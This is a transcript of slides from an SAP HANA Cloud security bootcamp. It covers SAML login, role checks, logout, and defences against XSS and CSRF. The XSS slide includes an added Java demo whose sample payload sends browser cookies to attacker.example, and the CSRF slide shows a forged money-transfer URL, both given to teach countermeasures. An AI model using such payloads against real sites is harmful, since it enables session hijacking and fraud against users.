Transcript

  • 1. SAP HANA Cloud – Virtual Bootcamp: Securing SAP HANA Cloud Applications
    Martin Raepple / Product Owner Identity and Access Management / SAP HANA Cloud Product Team
  • 2. Disclaimer (© 2012 SAP AG. All rights reserved.)
    This presentation outlines our general product direction and should not be relied on in making a purchase decision. This presentation is not subject to your license agreement or any other agreement with SAP. SAP has no obligation to pursue any course of business outlined in this presentation or to develop or release any functionality mentioned in this presentation. This presentation and SAP's strategy and possible future developments are subject to change and may be changed by SAP at any time for any reason without notice. This document is provided without a warranty of any kind, either express or implied, including but not limited to, the implied warranties of merchantability, fitness for a particular purpose, or non-infringement. SAP assumes no responsibility for errors or omissions in this document, except if such damages were caused by SAP intentionally or grossly negligent.
  • 3. Agenda
    Secure Cloud Application Development: Enabling Authentication, Enforcing Authorizations, Logout, Protecting from Common Web Attacks
    Local Testing: Configuring local test users and roles
    Testing in the Cloud: Using the local Test Identity Provider
    Identity and Access Management in the Cloud: Default Identity Federation with SAP ID Service, Identity Federation with the corporate Identity Provider, Role Assignments, Demo
    Security Troubleshooting: Logging and Tracing, SAML Debugging
  • 4. Secure Cloud Application Development
  • 5. Enabling Authentication (1/4): High-level Architecture
    The SAP HANA Cloud application delegates authentication and identity management to an Identity Provider (IdP) with a central user store, instead of keeping a local user store of its own, and stays focused on the business logic.
    + Delegation to a central service (IdP) enables Single Sign-On (SSO) between multiple Cloud applications
    + Mature and proven security standards for integration with the IdP
    Three options:
    • Local IdP in the SAP HANA Cloud SDK → for testing only!
    • SAP ID Service → "out-of-the-box" IdP in the Cloud
    • Your own IdP (e.g. in the corporate network)
  • 6. Enabling Authentication (2/4): Declarative …
    web.xml:

        <login-config>
          <auth-method>FORM</auth-method>
        </login-config>
        <security-constraint>
          <web-resource-collection>
            <web-resource-name>Protected</web-resource-name>
            <url-pattern>/admin/*</url-pattern>
          </web-resource-collection>
          <auth-constraint>
            <role-name>Administrator</role-name>
          </auth-constraint>
        </security-constraint>
        <security-role>
          <description>Administration users</description>
          <role-name>Administrator</role-name>
        </security-role>

    Supported Authentication Methods:
    • FORM: delegates authentication to the SAP ID Service or another IdP according to the Security Assertion Markup Language (SAML) 2.0 protocol.
    • BASIC: HTTP "basic" authentication scheme according to RFC 2617. Web browsers prompt users to enter a user name and password. The actual authentication is still delegated to the SAP ID Service or to a SCIM*-compliant IdP.
    * http://tools.ietf.org/html/draft-ietf-scim-api-01
  • 7. Enabling Authentication (3/4): … and Programmatic
    Inside a servlet method such as doGet(HttpServletRequest request, HttpServletResponse response); LoginContext and LoginException come from javax.security.auth.login, LoginContextFactory from the SAP HANA Cloud SDK:

        String user = request.getRemoteUser();
        if (user != null) {
            // the user already has an authenticated session
            response.getWriter().println("Hello, " + user);
        } else {
            LoginContext loginContext;
            try {
                // start a FORM login, i.e. the SAML 2.0 round trip to the IdP
                loginContext = LoginContextFactory.createLoginContext("FORM");
                loginContext.login();
                // after a successful login the user name is available on the request
                response.getWriter().println("Hello, " + request.getRemoteUser());
            } catch (LoginException e) {
                e.printStackTrace();
            }
        }
  • 8. Enabling Authentication (4/4): Excursus: SAML-based Single Sign-On (SSO)
    The SAP HANA Cloud application acts as SAML Service Provider (SP); it has a trust relationship with the Identity Provider (IdP).
    1. The user accesses a protected web resource on the SP.
    2. The SP sends a SAML Authentication Request via HTTP redirect to the trusted IdP.
    3. The IdP authenticates the user (if not done already).
    4. Upon successful authentication, the IdP sends a SAML Response (which includes the SAML Assertion) to the SAML Service Provider via HTTP POST.
  • 9. Enforcing Authorizations

        import java.io.IOException;
        import java.io.PrintWriter;
        import javax.servlet.ServletException;
        import javax.servlet.http.HttpServletRequest;
        import javax.servlet.http.HttpServletResponse;

        protected void doGet(HttpServletRequest request, HttpServletResponse response)
                throws ServletException, IOException {
            PrintWriter out = response.getWriter();
            // programmatic check of the role assigned to the logged-in user;
            // the role name must match the <security-role> declared in web.xml
            if (!request.isUserInRole("Administrator")) {
                response.sendError(403, "Logged in user does not have role Administrator");
                return;
            } else {
                out.println("Hello administrator");
            }
        }
  • 10. Programmatic Logout

        import java.io.IOException;
        import javax.security.auth.login.LoginContext;
        import javax.security.auth.login.LoginException;
        import javax.servlet.ServletException;
        import javax.servlet.http.HttpServlet;
        import javax.servlet.http.HttpServletRequest;
        import javax.servlet.http.HttpServletResponse;
        // LoginContextFactory is provided by the SAP HANA Cloud SDK

        public class LogoutServlet extends HttpServlet {
            ...
            protected void doGet(HttpServletRequest request, HttpServletResponse response)
                    throws ServletException, IOException {
                LoginContext loginContext = null;
                if (request.getRemoteUser() != null) {
                    try {
                        // terminate the logon session of the current user
                        loginContext = LoginContextFactory.createLoginContext();
                        loginContext.logout();
                    } catch (LoginException e) {
                        response.getWriter().println("Logout failed. Reason: " + e.getMessage());
                    }
                } else {
                    // no authenticated user on this request any more
                    response.getWriter().println("You have successfully logged out.");
                }
            }
        }
  • 11. Protecting from Common Web Attacks: Cross-Site Scripting (XSS) Attack
    Attack flow: (1) the attacker infects the vulnerable Cloud application with a malicious script; (2) the victim downloads a page carrying the malicious script; (3) the script executes in the context of the victim's session.
    The two most important countermeasures to prevent XSS attacks are to:
    • Constrain input
    • Encode output
    SAP HANA Cloud XSS Output Encoding Library (IXSSEncoder / XSSEncoder from the SDK):

        String encodedFirstname = null;
        IXSSEncoder xssEncoder = XSSEncoder.getInstance();
        try {
            // encode the untrusted value for an HTML text context before echoing it
            encodedFirstname = xssEncoder.encodeHTML(firstName).toString();
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        }
        out.println("<br>Hello, " + encodedFirstname);
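    The following is an added, self-contained example (not code from the slides or from the SAP SDK) that shows both countermeasures side by side: the vulnerable greeting that echoes the request parameter verbatim, and a hardened version that first constrains the input with a whitelist and then encodes the output. The encodeHtml helper is a minimal stand-in for IXSSEncoder.encodeHTML so the demo compiles without the SDK; in a real SAP HANA Cloud application use the SDK encoder shown above. The attacker payload and the class name are constructed for the demo.

```java
import java.util.regex.Pattern;

public class GreetingXssDemo {

    // Constrain input: a first name is letters, spaces, apostrophes and hyphens, at most 50 characters.
    private static final Pattern FIRST_NAME = Pattern.compile("^\\p{L}[\\p{L} '\\-]{0,49}$");

    static boolean isValidFirstName(String s) {
        return s != null && FIRST_NAME.matcher(s).matches();
    }

    // Encode output for an HTML text/attribute context (stand-in for IXSSEncoder.encodeHTML).
    static String encodeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                case '/':  sb.append("&#x2F;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Vulnerable: the untrusted parameter lands in the page unchanged.
    static String vulnerableGreeting(String firstName) {
        return "<br>Hello, " + firstName;
    }

    // Hardened: reject anything outside the whitelist (the servlet would answer 400),
    // and encode even the accepted value, so the encoder is the second line of defence.
    static String hardenedGreeting(String firstName) {
        if (!isValidFirstName(firstName)) {
            throw new IllegalArgumentException("firstName rejected by input validation");
        }
        return "<br>Hello, " + encodeHtml(firstName);
    }

    public static void main(String[] args) {
        // Constructed attacker payload, as it would arrive in ?firstName=...
        String payload = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>";

        System.out.println(vulnerableGreeting(payload));   // script tag reaches the browser
        try {
            System.out.println(hardenedGreeting(payload));
        } catch (IllegalArgumentException e) {
            System.out.println("400 Bad Request: " + e.getMessage());
        }
        // A legitimate name with a quote character passes validation and is still encoded.
        System.out.println(hardenedGreeting("O'Brien"));  // <br>Hello, O&#x27;Brien
    }
}
```

    The whitelist is deliberately strict; if the application must accept names that do not fit it, widen the pattern but never drop the encoding step, since encoding is what keeps an accepted value from being interpreted as markup.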
  • 12. Protecting from Common Web Attacks: Cross-Site Request Forgery (XSRF) Attack
    Attack flow: (1) the attacker's web site embeds <img src="http://www.webapp.com/transferMoney?account=hacker&amount=1000">; (2) the victim's web browser, which holds a valid session cookie (JSESSIONID=abc123) for the vulnerable application www.webapp.com, sends http://www.webapp.com/transferMoney?account=hacker&amount=1000 with that cookie attached.
    The attack depends on the predictability of the request URL to the vulnerable application.
    A countermeasure to prevent XSRF attacks is to generate and add a token or nonce per request which is checked on the server side.
    SAP HANA Cloud provides protection based on Apache Tomcat's CSRF Prevention Filter.
    web.xml:

        <filter>
          <filter-name>CsrfFilter</filter-name>
          <filter-class>org.apache.catalina.filters.CsrfPreventionFilter</filter-class>
          <init-param>
            <param-name>entryPoints</param-name>
            <param-value>/home</param-value>
          </init-param>
        </filter>
  • 13. Local Testing
  • 14. Configuring Test Users and Managing Roles on the Local Server
    SAP HANA Cloud Eclipse Tools: Servers view → Local Server → Users tab. The tab lists the local test users, the roles assigned to the selected user in the local server, and the user's attributes and values.
    The local server stores them in <local_server_dir>/config_master/com.sap.security.um.provider.neo.local/neousers.json, which the SAP HANA Cloud application running on the local server authenticates against.
  • 15. Testing in the Cloud
  • 16. Using the local Test Identity Provider
    The local test IdP is packaged within the SAP HANA Cloud SDK. When you start the local server, it will start as well. The application deployed on SAP HANA Cloud trusts the local test IdP, whose users come from neousers.json on the local server.
    1. Define local test IdP users and their attributes.
    2. Configure the service provider of your account in SAP HANA Cloud.
    3. Configure trust on SAP HANA Cloud to the local Test IdP.
    4. Configure trust on the local Test IdP to SAP HANA Cloud.
    Then access your application deployed on the SAP HANA Cloud and test it against the local test IdP and its defined users and attributes.
  • 17. Identity and Access Management in the Cloud
  • 18. Default Identity Federation with SAP ID Service
    By default, SAP HANA Cloud applications delegate authentication and identity management to SAP ID Service. No further configuration for the trust relationship is required.
    SAP ID Service is a public, SAML 2.0-compliant Identity Provider in the Cloud. It manages ~4.2 million users (e.g. for the SAP Community Network).
    With SAP ID Service, users can benefit from SSO to other SAP On-Demand solutions and web sites: SAP public web sites (SAP.com, SMP), SAP Business ByDesign, SAP JAM, …
    User attributes provided by SAP ID Service: User ID, validated e-mail address, first name, last name, display name.
  • 19. Identity Federation with the corporate Identity Provider
    SAP HANA Cloud applications can delegate authentication and identity management to an existing corporate IdP that can, for example, authenticate your company's employees from the corporate network.
    Trust must be configured similar to the local Test IdP scenario:
    • Configure the service provider of your account in SAP HANA Cloud
    • Configure trust on SAP HANA Cloud to the corporate IdP
    • Configure trust on the corporate IdP to SAP HANA Cloud
    User attributes provided by the corporate IdP: (corporate-wide unique) User ID and any user profile attribute from the corporate user directory.
  • 20. Role Assignments in the Cloud
    Roles allow you to control the access to application resources in SAP HANA Cloud.
    In the Cloud, you can assign groups or individual users to a role.
    Groups are collections of roles that allow the definition of business-level functions within your account. They are similar to the actual business roles existing in an organization.
    Diagram: group "Sales" (employees in department Sales) and the individual user jdoe@acme.com; roles: Administrator, CRM User, Account Owner.
  • 21. DEMO: SSO and Identity Federation with a corporate Identity Provider (IdP)
  • 22. Troubleshooting
  • 23. Network Protocol Analyzers
    • Wireshark
    • Fiddler
    • SAML Tracer (Firefox add-on)
  • 24. SAP HANA Cloud Logs
    com.sap.core.jpaas.security.saml2.sp (log category of the SAML 2.0 service provider component)
  • 25. Online Q&A
  • 26. Questions & Answers
    Q: Is there anything specific for securing REST services?
    A: Right now, REST clients calling services exposed by the same application from within the UI (e.g. SAP UI JavaScript using an OData Model) can re-use an already established logon session (e.g. via SAML2) of the user at the UI. Applications exposing (REST) services and no UI can use HTTP Basic Authentication via SSL at the moment to protect those services. For those scenarios we plan to support the Open Authorization Framework (OAuth) in the SAP HANA Cloud Platform which helps to avoid storing the username and password in the client application.
    Q: So once a user is authenticated in the browser, the browser based UI could use REST services?
    A: Yes!
  • 27. SAP HANA Cloud Virtual Bootcamp Sessions Schedule
    Next upcoming bootcamp session: 6th Virtual Bootcamp: Working with the HANA Cloud portal (overview of the features, capabilities and installation procedure). Details and schedule will be provided soon.
    At the end of each session, we will give some time for Q&A.
    Remarks:
    ■ The Virtual Bootcamp sessions are scheduled for the developers of our HANA Cloud Applications partners and the community interested in our HANA Cloud Applications partner program.
    ■ The sessions will be recorded and provided to our HANA Cloud partner community.
  • 28. Thank You!
    Contact information: Martin Raepple, SAP HANA Cloud, martin.raepple@sap.com